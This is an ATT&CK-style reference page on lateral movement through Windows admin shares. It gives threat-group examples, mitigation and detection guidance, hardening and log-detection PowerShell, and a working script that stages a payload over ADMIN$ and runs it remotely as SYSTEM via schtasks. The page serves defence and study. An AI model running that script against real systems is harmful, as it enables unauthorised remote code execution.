# Windows Admin Shares

• Type: Technique
• ID: T1077
• Tactic: Lateral Movement
• Platform: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10
• System Requirements: File and printer sharing over SMB enabled; host and network firewalls not blocking SMB ports between source and destination. A domain account that is a member of the Administrators group on the remote system, or the default local administrator account.
• Data Sources: Process use of network, Authentication logs, Process command-line parameters, Process monitoring
• CAPEC ID: CAPEC-561

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB)[1] to interact with systems using remote procedure calls (RPCs),[2] transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with certain configuration and patch levels by means of Pass the Hash.[3] The Net utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials.[4]

## Examples

• Deep Panda uses net.exe to connect to network shares using "net use" commands with compromised credentials.[5]
• Ke3chang actors have been known to copy files to the network shares of other computers to move laterally.[6]
• Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.[7]
• Threat Group-1314 actors mapped network drives using net use.[8]
• Turla uses net use commands to connect to other systems within a network.[9]
• BlackEnergy has run a plug-in on a victim to spread through the local network by using PsExec and accessing admin shares.[10]
• Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on the remote machine that executes the malware.[11]
• Net Crawler uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.[12]
• Lateral movement can be done with Net through net use commands to connect to the Windows admin shares on remote systems.[13]
• PsExec, a tool that has been used by adversaries, writes programs to the ADMIN$ network share to execute commands on remote systems.[14]
• The Regin malware platform can use Windows admin shares to move laterally.[15]
• Shamoon accesses network shares, enables share access to the target device, copies an executable payload to the target system, and uses a Scheduled Task to execute the malware.[16]
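The sequence the description and the Duqu, Shamoon and PsExec examples above share (authenticate to ADMIN$ with net use, copy a binary through the share, execute it with a remotely created scheduled task) is shown below as an added PowerShell example. It is not code from the page or from any tool or group the page cites; the host name, account, password, payload path and task name are placeholders chosen for illustration, and the script simply drives the built-in net.exe and schtasks.exe utilities the text describes.

```powershell
# Added example (not from the page or any of the tools it cites): the admin-share
# lateral-movement sequence described above, scripted in PowerShell around the built-in
# net.exe and schtasks.exe. Every host name, account, password and path below is a
# placeholder assumption, not a value taken from the page.
param(
    [string]$Target   = 'FILESRV01',           # hypothetical remote host
    [string]$User     = 'CORP\svc_backup',     # hypothetical account that is a local admin on $Target
    [string]$Password = 'Hypothetical-P@ss',   # hypothetical; net.exe only accepts a plaintext password
    [string]$Payload  = 'C:\Tools\agent.exe'   # hypothetical binary to stage on the target
)

# ADMIN$ maps to %SystemRoot% on the target (normally C:\Windows); C$ would expose the whole volume.
$share      = "\\$Target\ADMIN`$"
$remoteFile = Join-Path $share 'Temp\agent.exe'   # UNC path as written through the share
$localFile  = 'C:\Windows\Temp\agent.exe'         # the same file as the target itself sees it
$taskName   = 'UpdateCheck'                       # hypothetical task name

# 1. Authenticate an SMB session to the hidden administrative share. This is the "net use"
#    step in the Deep Panda, Turla and Threat Group-1314 examples; on the target it produces a
#    type-3 (network) logon and, if file-share auditing is on, a 5140 share-access event.
net use $share /user:$User $Password
if ($LASTEXITCODE -ne 0) { throw "net use $share failed with exit code $LASTEXITCODE" }

try {
    # 2. File transfer over the authenticated session. Copy-Item to the UNC path reuses the
    #    SMB session net.exe just opened, so no drive letter is needed. Writing into
    #    %SystemRoot% via ADMIN$ is exactly what PsExec does with its service binary.
    Copy-Item -Path $Payload -Destination $remoteFile -Force

    # 3. Remote Execution through a Scheduled Task (the Duqu and Shamoon pattern). schtasks.exe
    #    authenticates to the target's Task Scheduler over RPC with the same credentials.
    #    /ru SYSTEM runs the binary as LocalSystem; /sc once /st 00:00 gives the task a start
    #    time that has already passed today (schtasks warns but still creates it), so it only
    #    fires when /run triggers it.
    schtasks /create /s $Target /u $User /p $Password /tn $taskName /tr $localFile /sc once /st 00:00 /ru SYSTEM /f
    if ($LASTEXITCODE -ne 0) { throw "schtasks /create failed with exit code $LASTEXITCODE" }
    schtasks /run /s $Target /u $User /p $Password /tn $taskName
    if ($LASTEXITCODE -ne 0) { throw "schtasks /run failed with exit code $LASTEXITCODE" }
}
finally {
    # 4. Remove the task definition and drop the SMB session. The copied binary and the
    #    Security and Task Scheduler log entries on the target remain, which is what the
    #    Detection section of this page keys on.
    schtasks /delete /s $Target /u $User /p $Password /tn $taskName /f 2>$null
    net use $share /delete /y
}
```

Every step here needs an account that is a local administrator on the target, which is why the Mitigation section below concentrates on local administrator passwords, group membership and the remote use of local credentials rather than on the share mechanism itself.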

## Mitigation

Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group on multiple systems.
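The following added PowerShell example (not from the page) audits a single host against the points in the paragraph above and, with -Fix, applies the two registry values that implement "deny remote use of local admin credentials". The registry paths, value names and the Windows behaviour they control are Microsoft's documented ones; the function name, the output format and the -Fix switch are this example's own. It assumes an elevated PowerShell 5.1 or later session, since Get-LocalGroupMember, Get-LocalUser and Get-SmbShare are not available on the older platforms the page lists.

```powershell
# Added example (not from the page): audit a Windows host against the first Mitigation
# paragraph and, with -Fix, apply the two registry settings behind "deny remote use of local
# admin credentials". Registry keys and value names are Microsoft's; the function name, output
# format and -Fix switch are this example's own. Needs an elevated PowerShell 5.1+ session.
[CmdletBinding()]
param([switch]$Fix)

$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$lanmanKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-RegDword([string]$Path, [string]$Name) {
    # $null means the value is absent, i.e. Windows is running with its default behaviour.
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Get-AdminShareExposure {
    $findings = @()

    # 1. UAC remote restrictions. With LocalAccountTokenFilterPolicy = 0 or absent (the default),
    #    a local account other than the built-in RID-500 Administrator receives a filtered,
    #    non-admin token on network logons and therefore cannot open ADMIN$ or C$ from another
    #    host. Setting it to 1 (often done to make remote WMI or PsExec work) re-enables the
    #    exact path this technique relies on, including with pass-the-hash.
    if ((Get-RegDword $policyKey 'LocalAccountTokenFilterPolicy') -eq 1) {
        $findings += 'LocalAccountTokenFilterPolicy=1: local admin accounts get full tokens over the network'
        if ($Fix) { Set-ItemProperty -Path $policyKey -Name LocalAccountTokenFilterPolicy -Value 0 -Type DWord }
    }

    # 2. The built-in Administrator (RID 500) is exempt from that filter unless Admin Approval
    #    Mode is also enforced for it (FilterAdministratorToken = 1). An enabled RID-500 account
    #    whose password is shared across machines is the classic admin-share pivot.
    if ((Get-RegDword $policyKey 'FilterAdministratorToken') -ne 1) {
        $findings += 'FilterAdministratorToken not 1: built-in Administrator keeps a full token on network logons'
        if ($Fix) { Set-ItemProperty -Path $policyKey -Name FilterAdministratorToken -Value 1 -Type DWord }
    }
    $rid500 = Get-LocalUser | Where-Object { $_.SID.Value -match '-500$' }
    if ($rid500.Enabled) { $findings += "Built-in Administrator account '$($rid500.Name)' is enabled" }

    # 3. "Do not allow domain user accounts to be in the local Administrators group": report every
    #    member other than the built-in account so domain users and groups can be checked against policy.
    foreach ($m in Get-LocalGroupMember -Group 'Administrators') {
        if ($m.SID.Value -notmatch '-500$') {
            $findings += "Administrators member: $($m.Name) [$($m.ObjectClass), $($m.PrincipalSource)]"
        }
    }

    # 4. Whether the hidden shares are created at all. AutoShareServer (server SKUs) and
    #    AutoShareWks (workstations) = 0 suppress C$ and ADMIN$ at boot; IPC$ remains, and remote
    #    management tooling that depends on ADMIN$ (PsExec included) stops working, so this is
    #    reported rather than changed.
    foreach ($name in 'AutoShareServer', 'AutoShareWks') {
        $v = Get-RegDword $lanmanKey $name
        if ($v -ne 0) { $findings += "$name=$(if ($null -eq $v) { 'absent (default: create shares)' } else { $v })" }
    }
    foreach ($s in Get-SmbShare | Where-Object { $_.Name -match '^(ADMIN|[A-Z])\$$' }) {
        $findings += "Hidden administrative share present: $($s.Name) -> $($s.Path)"
    }
    $findings
}

Get-AdminShareExposure
```

The registry values are the per-host equivalent of the Group Policy approach; on Windows 8.1 and Server 2012 R2 and later the same outcome can be enforced centrally by adding the well-known SID S-1-5-114 ("Local account and member of Administrators group") to "Deny access to this computer from the network". Password reuse across hosts cannot be judged from a single machine, so the first two sentences of the paragraph still need a fleet-wide process rather than a local check.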

Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting[17] tools, like AppLocker,[18][19] or Software Restriction Policies[20] where appropriate.[21]

## Detection

Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to record success and failure for accounts that may be used to move laterally, and those events can be collected using tools such as Windows Event Forwarding.[22][23] Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as Net, on the command-line interface, and for Discovery techniques that could be used to find remotely accessible systems.
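As an added example of the remote-login and share-access monitoring described above (not code from the page), the PowerShell below flags clients that open ADMIN$ or a drive share and attaches any scheduled-task creation or service installation that follows within a short window, which is the PsExec and schtasks footprint of this technique. The event IDs and XML field names are Microsoft's (Security log 4624, 5140 and 4698, System log 7045); the flattened event shape, the ten-minute window, the function names and the sample events are this example's own, and the sample events are constructed so the logic runs offline. Event 5140 only appears when the "Audit File Share" subcategory is enabled on the monitored hosts.

```powershell
# Added example (not from the page): detection logic for the monitoring described above, run
# here over constructed sample events so it works offline. Event IDs and field names are
# Microsoft's (Security 4624, 5140, 4698; System 7045); the normalized shape, the 10-minute
# window and the function names are this example's own. 5140 needs "Audit File Share" enabled.

# 5140 renders share names as \\*\ADMIN$, \\*\C$ and so on. IPC$ is deliberately not a trigger:
# every SMB/RPC session tree-connects IPC$, so on its own it carries little signal.
$adminShareRegex = '^\\\\\*\\(ADMIN|[A-Za-z])\$$'

function Find-AdminShareSessions {
    param([Parameter(Mandatory)][object[]]$Events, [int]$WindowMinutes = 10)
    # Group ADMIN$/C$ accesses by client address and account, then attach execution events
    # (scheduled task created, service installed) that follow within the window. 4698 and 7045
    # carry no client address, so they are attached by time only and should be read as leads.
    $hits = $Events | Where-Object { $_.Id -eq 5140 -and $_.ShareName -match $adminShareRegex }
    foreach ($grp in ($hits | Group-Object IpAddress, Account)) {
        $first = $grp.Group | Sort-Object TimeCreated | Select-Object -First 1
        $until = $first.TimeCreated.AddMinutes($WindowMinutes)
        $exec  = $Events | Where-Object {
            $_.Id -in 4698, 7045 -and $_.TimeCreated -ge $first.TimeCreated -and $_.TimeCreated -le $until
        }
        $logon = $Events | Where-Object {
            $_.Id -eq 4624 -and $_.LogonType -eq 3 -and $_.IpAddress -eq $first.IpAddress -and $_.Account -eq $first.Account
        } | Select-Object -First 1
        [pscustomobject]@{
            Source       = $first.IpAddress
            Account      = $first.Account
            NetworkLogon = [bool]$logon
            Shares       = ($grp.Group.ShareName | Sort-Object -Unique) -join ', '
            FollowOnExec = ($exec | ForEach-Object { "$($_.Id) $($_.Detail)" }) -join '; '
            FirstSeen    = $first.TimeCreated
        }
    }
}

function Get-NormalizedEvents {
    # Live equivalent of the sample below: project the EventData of the last 24 hours of relevant
    # Security events (plus System 7045) into the flat shape Find-AdminShareSessions expects.
    # Note that for 4624 the account that logged on is TargetUserName, not SubjectUserName.
    $since = (Get-Date).AddDays(-1)
    $raw = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624, 5140, 4698; StartTime = $since } -ErrorAction SilentlyContinue) +
           @(Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $since } -ErrorAction SilentlyContinue)
    foreach ($e in $raw) {
        $d = @{}
        foreach ($n in ([xml]$e.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Id          = $e.Id
            TimeCreated = $e.TimeCreated
            IpAddress   = $d['IpAddress']
            Account     = $(if ($e.Id -eq 4624) { $d['TargetUserName'] } elseif ($e.Id -eq 7045) { $null } else { $d['SubjectUserName'] })
            LogonType   = [int]$d['LogonType']
            ShareName   = $d['ShareName']
            Detail      = $(if ($e.Id -eq 4698) { $d['TaskName'] } elseif ($e.Id -eq 7045) { "$($d['ServiceName']) $($d['ImagePath'])" } else { $null })
        }
    }
}

# Constructed sample events (not real log data) in the shape Get-NormalizedEvents produces: one
# client reaches IPC$ and ADMIN$ after a network logon and a PSEXESVC service is installed a few
# seconds later; a second client opens an ordinary share, which must not be flagged.
$t0 = [datetime]'2017-05-01T10:00:00'
$sample = @(
    [pscustomobject]@{ Id = 4624; TimeCreated = $t0;                IpAddress = '10.0.0.25'; Account = 'svc_backup'; LogonType = 3; ShareName = $null;        Detail = $null }
    [pscustomobject]@{ Id = 5140; TimeCreated = $t0.AddSeconds(1);  IpAddress = '10.0.0.25'; Account = 'svc_backup'; LogonType = 0; ShareName = '\\*\IPC$';   Detail = $null }
    [pscustomobject]@{ Id = 5140; TimeCreated = $t0.AddSeconds(2);  IpAddress = '10.0.0.25'; Account = 'svc_backup'; LogonType = 0; ShareName = '\\*\ADMIN$'; Detail = $null }
    [pscustomobject]@{ Id = 7045; TimeCreated = $t0.AddSeconds(6);  IpAddress = $null;       Account = $null;        LogonType = 0; ShareName = $null;        Detail = 'PSEXESVC C:\Windows\PSEXESVC.exe' }
    [pscustomobject]@{ Id = 5140; TimeCreated = $t0.AddMinutes(45); IpAddress = '10.0.0.40'; Account = 'jdoe';       LogonType = 0; ShareName = '\\*\Public'; Detail = $null }
)
Find-AdminShareSessions -Events $sample | Format-Table -AutoSize
# Live: Find-AdminShareSessions -Events (Get-NormalizedEvents) | Format-Table -AutoSize
```

On the sample the function reports a single session: 10.0.0.25 as svc_backup, with a matching type-3 logon, ADMIN$ as the share, and the PSEXESVC service installation as follow-on execution; the IPC$ access is dropped by the trigger regex and the Public share access from 10.0.0.40 is not administrative and is not reported. In production the same logic runs against events collected centrally (for example through Windows Event Forwarding, as the paragraph above suggests) rather than on each host, and it should be paired with the process and command-line monitoring for net.exe, schtasks.exe and similar tools that the paragraph also calls for.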